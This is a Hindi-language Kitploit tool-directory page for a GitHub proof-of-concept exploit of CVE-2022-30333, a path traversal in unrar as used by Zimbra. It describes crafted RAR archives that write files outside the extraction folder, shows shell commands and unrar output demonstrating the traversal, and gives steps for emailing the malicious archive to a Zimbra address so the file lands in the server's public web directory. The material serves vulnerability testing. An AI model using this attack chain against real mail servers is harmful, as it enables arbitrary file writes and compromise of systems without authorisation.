Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-30333-PoC — CVE-2022-30333 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Zimbra द्वारा उपयोग किए जाने वाले unrar में एक पाथ ट्रैवर्सल भेद्यता है, जो क्राफ्टेड RAR आर्काइव के माध्यम से मनमानी फ़ाइल लेखन का प्रदर्शन करता है। | Kitploit
उपकरण/GitHubGitHub/thel1ghtvn/cve-2022-30333-poc
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubthel1ghtvn/cve-2022-30333-poc

CVE-2022-30333-PoC

CVE-2022-30333 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Zimbra द्वारा उपयोग किए जाने वाले unrar में एक पाथ ट्रैवर्सल भेद्यता है, जो क्राफ्टेड RAR आर्काइव के माध्यम से मनमानी फ़ाइल लेखन का प्रदर्शन करता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
रिपॉजिटरी देखें
1334 साल पहलेअभी तक समीक्षित नहीं
साझा करें

CVE-2022-30333-POC

CVE-2022-30333 का परीक्षण करने के लिए नमूना फ़ाइल

  • Sample.rar : यदि आप Linux पर परीक्षण करना चाहते हैं। जब आप निकालते हैं, तो यह ../../tmp/traversed में trav बनाता है। कृपया सुनिश्चित करें कि Sample.rar निकालने से पहले ../../tmp/traversed निर्देशिका मौजूद है।

  • exp.rar : यदि आप Zimbra मेल सर्वर पर परीक्षण करना चाहते हैं। जब आप निकालते हैं, तो यह /opt/zimbra/jetty_base/webapps/zimbra/public/ में moo.txt बनाता है। आप इस फ़ाइल को https://zimbra_mail_domain/public/moo.txt पर एक्सेस कर सकते हैं।

शोषण के चरण

Linux पर परीक्षण

root@kitploit:~
mkdir ../../tmp/traversed (the destination folder must exsist before unrar)

ls -la ../../tmp/traversed/
total 8
drwxrwxr-x 2 ubuntu ubuntu 4096 Jul  4 02:44 .
drwxrwxr-x 4 ubuntu ubuntu 4096 Jul  4 02:40 ..

unrar x exp.rar

UNRAR 6.10 beta 1 freeware      Copyright (c) 1993-2021 Alexander Roshal

Corrupt header is found
sym - the file header is corrupt

Extracting from exp.rar

Corrupt header is found
sym - the file header is corrupt
Extracting  sym                                                       OK 
Extracting  sym/trav                                                  OK 
Total errors: 4

ls -la ../../tmp/traversed/
total 12
drwxrwxr-x 2 ubuntu ubuntu 4096 Jul  4 02:47 .
drwxrwxr-x 4 ubuntu ubuntu 4096 Jul  4 02:40 ..
-rw-rw-r-- 1 ubuntu ubuntu   14 Jul  4 02:44 trav

cat ../../tmp/traversed/trav
"traversed"

Zimbra पर परीक्षण

  • एक ईमेल बनाएं और दुर्भावनापूर्ण rar फ़ाइल संलग्न करें, फिर Zimbra ईमेल पते पर भेजें। Amavisd के साथ विश्लेषण करते समय यह rar फ़ाइल निकाली जाएगी।
  • moo.txt यहाँ होना चाहिए: /opt/zimbra/jetty_base/webapps/zimbra/public/moo.txt या https://zimbra_mail_domain/public/moo.txt

संदर्भ

  1. DEV2SEC से वियतनामी ब्लॉग
  2. Sonarsource से अंग्रेज़ी ब्लॉग
  3. mrlihd को विशेष धन्यवाद जिन्होंने Zimbra में attack-chain को फिर से बनाने में मेरी मदद की।
टूल डाउनलोड करें